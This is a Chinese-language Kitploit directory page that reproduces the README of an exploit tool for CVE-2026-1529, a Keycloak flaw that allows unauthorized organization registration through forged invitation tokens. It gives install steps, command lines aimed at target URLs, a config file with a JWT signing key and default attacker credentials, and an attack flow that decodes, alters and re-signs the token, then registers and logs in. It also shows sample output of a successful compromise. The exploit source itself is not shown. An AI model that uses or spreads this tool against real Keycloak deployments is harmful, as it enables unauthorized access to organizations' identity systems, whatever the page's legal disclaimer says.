Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/0x240x23elu/cve-2026-1529
身份验证与授权Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHub0x240x23elu/cve-2026-1529

CVE-2026-1529

Keycloak:通过不当的邀请令牌验证实现未授权组织注册

查看仓库
326个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-1529 Keycloak 漏洞利用工具

Python Version License Status

CVE-2026-1529:Keycloak - 通过不当的邀请令牌验证实现未授权组织注册

⚠️ 警告:本工具仅用于教育和授权的安全测试目的。未经授权访问计算机系统是违法的。

📋 目录

  • 概述
  • 功能特性
  • 前提条件
  • 安装
  • 使用方法
  • 配置
  • 工作原理
  • 输出
  • 故障排除
  • 法律声明
  • 贡献
  • 致谢

🎯 概述

本工具演示了 Keycloak 中的一个严重漏洞(CVE-2026-1529),该漏洞允许通过不当的 JWT 邀请令牌验证实现未授权组织注册。该漏洞利用通过操纵邀请令牌来获得对 Keycloak 实例的未授权访问。

漏洞详情:

  • CVE ID:CVE-2026-1529
  • 严重程度:严重
  • 攻击向量:网络
  • 攻击复杂度:低
  • 受影响范围:启用组织邀请功能的 Keycloak 实例

✨ 功能特性

  • ✅ 自动漏洞检测
  • ✅ JWT 令牌操纵
  • ✅ 自动用户注册
  • ✅ 登录验证
  • ✅ 详细的漏洞利用报告
  • ✅ 可配置参数
  • ✅ 调试日志支持
  • ✅ 多重试 HTTP 客户端

📦 前提条件

  • Python 3.7 或更高版本
  • pip(Python 包管理器)
  • 虚拟环境(推荐)
  • 目标 Keycloak 实例(仅限授权测试)

🚀 安装

方法一:克隆仓库

root@kitploit:~
# 克隆仓库
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# 创建虚拟环境
python3 -m venv venv
source venv/bin/activate  # Windows 系统:venv\Scripts\activate

# 安装依赖
pip install -r requirements.txt

方法二:手动安装

root@kitploit:~
# 创建目录结构
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit

# 从发布版本下载文件或手动复制
# 然后安装依赖
pip install requests urllib3 PyJWT

文件结构

root@kitploit:~
keycloak-exploit/
├── keycloak-exploit.py           # 主漏洞利用脚本
├── requirements.txt              # Python 依赖
├── README.md                     # 本文件
├── config/
│   └── default_config.json       # 配置文件
├── utils/
│   ├── __init__.py              # 包初始化文件
│   ├── http_utils.py            # HTTP 客户端工具
│   ├── jwt_utils.py             # JWT 操纵
│   └── crypto_utils.py          # 加密工具
├── logs/                         # 自动生成的日志
└── output/
    └── reports/                  # 漏洞利用报告

💻 使用方法

基本用法

root@kitploit:~
python3 keycloak-exploit.py https://target-keycloak.com

高级选项

root@kitploit:~
# 使用自定义邀请令牌
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com

# 使用自定义组织 ID
python3 keycloak-exploit.py -o custom_org_id https://target.com

# 使用自定义配置文件
python3 keycloak-exploit.py -c /path/to/config.json https://target.com

# 启用调试日志
python3 keycloak-exploit.py -d https://target.com

# 显示帮助
python3 keycloak-exploit.py -h

# 显示版本
python3 keycloak-exploit.py -v

命令行参数

⚙️ 配置

编辑 config/default_config.json 以自定义漏洞利用参数:

root@kitploit:~
{
    "exploit": {
        "default_username": "admin_user_2026",
        "default_password": "KeycloakCVE2026!",
        "default_email": "[email protected]",
        "timeout": 30,
        "max_retries": 3
    },
    "jwt": {
        "algorithm": "HS256",
        "secret_key": "keycloak-cve-2026-1529-exploit",
        "token_expiry": 3600
    },
    "target": {
        "endpoints": {
            "realms": "/realms",
            "organizations": "/organizations",
            "register": "/register",
            "login": "/login"
        }
    },
    "output": {
        "log_level": "INFO",
        "save_reports": true,
        "report_format": "txt"
    }
}

配置选项

🔧 工作原理

该漏洞利用按以下步骤进行:

  1. 漏洞检查

    • 连接到目标 Keycloak 实例
    • 检测 Keycloak 版本
    • 测试组织端点
  2. 令牌生成/操纵

    • 生成或接受邀请令牌
    • 解码 JWT 令牌
    • 操纵载荷中的组织 ID
    • 使用已知密钥重新签名令牌
  3. 用户注册

    • 使用被操纵的令牌提交注册
    • 绕过组织验证
    • 创建未授权用户账户
  4. 登录验证

    • 使用创建的凭据测试登录
    • 生成访问令牌
    • 提供登录 URL
  5. 报告生成

    • 创建详细的漏洞利用报告
    • 保存到 output/reports/
    • 包含所有技术细节

攻击流程示意图

root@kitploit:~
┌─────────────────┐
│  目标检查        │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  令牌生成/获取   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ 令牌操纵         │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ 用户注册         │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ 登录测试         │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│ 报告生成         │
└─────────────────┘

📊 输出

成功漏洞利用输出

root@kitploit:~
============================================================
CVE-2026-1529 漏洞利用结果
============================================================
✓ 目标存在 CVE-2026-1529 漏洞

🎯 漏洞利用成功!
用户名:admin_user_2026
密码:KeycloakCVE2026!
邮箱:[email protected]
登录链接:https://target.com/realms/master/account

📄 报告已保存至:output/reports/exploit_report_20260211_050507.txt

🔐 使用提供的凭据访问 Keycloak 实例!
⚠️  这演示了因 CVE-2026-1529 导致的未授权访问

============================================================
by f3ds cr3w est, 2002
============================================================

生成的报告

详细报告保存至 output/reports/,包含:

  • 目标信息
  • 每个步骤的漏洞利用结果
  • 创建的用户凭据
  • 登录链接
  • 原始和被操纵的令牌
  • 技术细节
  • CVE 信息
  • 安全建议

日志文件

日志保存至 logs/ 目录,包含详细的执行信息。

🐛 故障排除

常见问题

1. ModuleNotFoundError: No module named 'utils'

解决方案:

root@kitploit:~
# 确保你在正确的目录中
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com

2. 找不到配置文件

解决方案:

root@kitploit:~
# 确保 config 目录存在
mkdir -p config
# 在 config/ 中复制或创建 default_config.json

3. Retry.init() got an unexpected keyword argument 'method_whitelist'

解决方案: 此问题已在最新版本中修复。更新 urllib3:

root@kitploit:~
pip install --upgrade urllib3

4. 目标不存在漏洞

可能原因:

  • 目标不是 Keycloak 实例
  • Keycloak 无法访问
  • 组织功能已禁用
  • 目标已针对 CVE-2026-1529 打补丁

解决方案:

root@kitploit:~
# 启用调试日志以查看更多详细信息
python3 keycloak-exploit.py -d https://target.com

5. 连接超时

解决方案:

root@kitploit:~
# 在 config/default_config.json 中增加超时时间
"timeout": 60

调试模式

启用详细日志以排查问题:

root@kitploit:~
python3 keycloak-exploit.py -d https://target.com

这将显示:

  • 详细的 HTTP 请求/响应
  • 令牌操纵步骤
  • 注册尝试
  • 完整的错误堆栈跟踪

📜 法律声明

root@kitploit:~
⚠️ 重要法律声明 ⚠️

本工具仅用于教育和授权的安全测试目的。

使用本工具即表示您同意:

1. 您只会在您拥有或获得明确书面许可的系统上使用本工具。

2. 您了解未经授权访问计算机系统是违法的,相关法律包括但不限于:
   - 《计算机欺诈和滥用法》(CFAA)- 美国
   - 《计算机滥用法》- 英国
   - 其他国家的类似法律

3. 您对使用本工具的任何后果承担全部责任。

4. 作者和贡献者不对本工具造成的任何滥用或损害负责。

5. 本工具按"原样"提供,不附带任何形式的保证。

自行承担使用风险。未经授权访问是犯罪行为。

🤝 贡献

欢迎贡献!请遵循以下指南:

  1. Fork 仓库
  2. 创建功能分支(git checkout -b feature/improvement)
  3. 提交更改(git commit -am 'Add new feature')
  4. 推送到分支(git push origin feature/improvement)
  5. 创建拉取请求

开发环境设置

root@kitploit:~
# 克隆你的 fork
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit

# 创建虚拟环境
python3 -m venv venv
source venv/bin/activate

# 安装依赖
pip install -r requirements.txt

# 进行更改并测试
python3 keycloak-exploit.py https://test-target.com

代码风格

  • 遵循 PEP 8 指南
  • 为函数添加文档字符串
  • 尽可能包含类型提示
  • 编写描述性的提交信息

🏆 致谢

创建者: f3ds cr3w est, 2002

依赖项

  • requests - HTTP 库
  • urllib3 - HTTP 客户端
  • PyJWT - JWT 实现

📝 版本历史

v1.0.0 (2026-02-11)

  • 初始版本
  • CVE-2026-1529 漏洞利用实现
  • JWT 令牌操纵
  • 自动用户注册
  • 报告生成
  • 调试日志支持

🔗 资源

  • CVE-2026-1529 详情
  • Keycloak 文档
  • JWT 最佳实践
  • OWASP 测试指南

📧 联系方式

如有问题、疑问或安全顾虑:

  • 在 GitHub 上提交 issue
  • 联系:[[email protected]]
  • 安全问题:请私下报告

请记住: 始终践行负责任的披露和道德黑客行为。 参考:https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation 由 f3ds cr3w est, 2002 用 ❤️ 制作

下载工具
参数简写描述
target-目标 Keycloak URL(必填)
--token-t自定义邀请令牌
--org-id-o自定义组织 ID
--config-c配置文件路径
--debug-d启用调试日志
--version-v显示版本信息
--help-h显示帮助信息
部分参数描述默认值
exploitdefault_username注册用户名admin_user_2026
exploitdefault_password注册密码KeycloakCVE2026!
exploitdefault_email注册邮箱[email protected]
exploittimeoutHTTP 请求超时时间(秒)30
exploitmax_retries最大 HTTP 重试次数3
jwtalgorithmJWT 签名算法HS256
jwtsecret_keyJWT 密钥自定义
jwttoken_expiry令牌过期时间(秒)3600